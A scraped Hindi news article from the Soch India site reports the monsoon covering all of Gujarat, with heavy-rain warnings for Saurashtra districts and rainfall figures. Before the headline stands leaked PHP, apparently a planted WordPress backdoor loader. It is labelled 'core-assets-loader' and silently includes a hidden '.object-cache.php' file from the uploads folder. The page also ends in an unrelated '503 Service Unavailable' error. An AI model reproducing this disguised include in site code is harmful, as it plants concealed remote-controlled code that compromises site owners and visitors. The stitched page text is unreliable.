add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अहमदाबाद पहुंचे मानसून ने पूरे गुजरात को किया कवर, जामनगर, द्वारका समेत कई जिलों में दो दिनों तक भारी बारिश की चेतावनी – SOCH INDIA
Menu

देश
अहमदाबाद पहुंचे मानसून ने पूरे गुजरात को किया कवर, जामनगर, द्वारका समेत कई जिलों में दो दिनों तक भारी बारिश की चेतावनी

nobanner

गुजरात में दस्तक दे चुके मानसून की आखिकार मध्य गुजरात में भी एंट्री हो गई। इस तरह अब मानसून पूरे राज्य में छा चुका है। शुक्रवार को वडोदरा में झमाझम बरसात के बाद आज अहमदाबाद के कई इलाकों में सुबह से ही रुक-रुककर बारिश हो रही है। वहीं, मौसम विभाग ने जामनगर, द्वारका समेत सौराष्ट्र के कई जिलों में आगामी दो दिनों तक भारी बारिश की चेतावनी जारी की है।

सौराष्ट्र में मौसम खराब होने की संभावना
मौसम विभाग के अनुसार, सौराष्ट्र में मूसलाधार बारिश के साथ 50-60 प्रति घंटे की स्पीड से तेज हवाएं चल सकती हैं। इसके चलते दो दिनों तक मछुआरों को समुद्र की न जाने की सलाह दी गई है। वहीं, सौराष्ट्र में लोगों को भी सावधानी रखने की सलाह दी जा रही है। साबरकांठा में आज सुबह से ही मूसलाधार बारिश हो रही है। सुबह 6 बजे से 9 बजे तक ही 14 मिमी बारिश दर्ज की गई।

आणंद में 4 घंटे में ही हो गई 7 इंच बारिश
बता दें, शुक्रवार को आणंद जिले में बादल फटने जैसे हालात बन गए थे। शुक्रवार सुबह (6 बजे से 10 बजे तक) शहर व आसपास के गांवों में 4 घंटे में ही 7 इंच बारिश होने से बाढ़ के हालात बन गए थे। निचले इलाकों में स्थित घरों में पानी भर जाने से लोगों को काफी नुकसान उठाना पड़ा है।

लगातार दूसरे साल अच्छे मानसून का पूर्वानुमान
समय पर मानसून के आगमन के चलते राज्य में लगातार दूसरे साल भी अच्छी बारिश की उम्मीद है। राज्य में अब तक औसतन 32.83 मिमी बारिश हुई है, जो कुल बारिश का 3.91 फीसदी है। सिर्फ कच्छ में सामान्य वर्षा को छोड़कर, उत्तरी गुजरात क्षेत्र में 3.40, मध्य पूर्व क्षेत्र में 3.96, सौराष्ट्र में 3.01 प्रतिशत और दक्षिण गुजरात में 4.86 प्रतिशत बारिश हो चुकी है।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.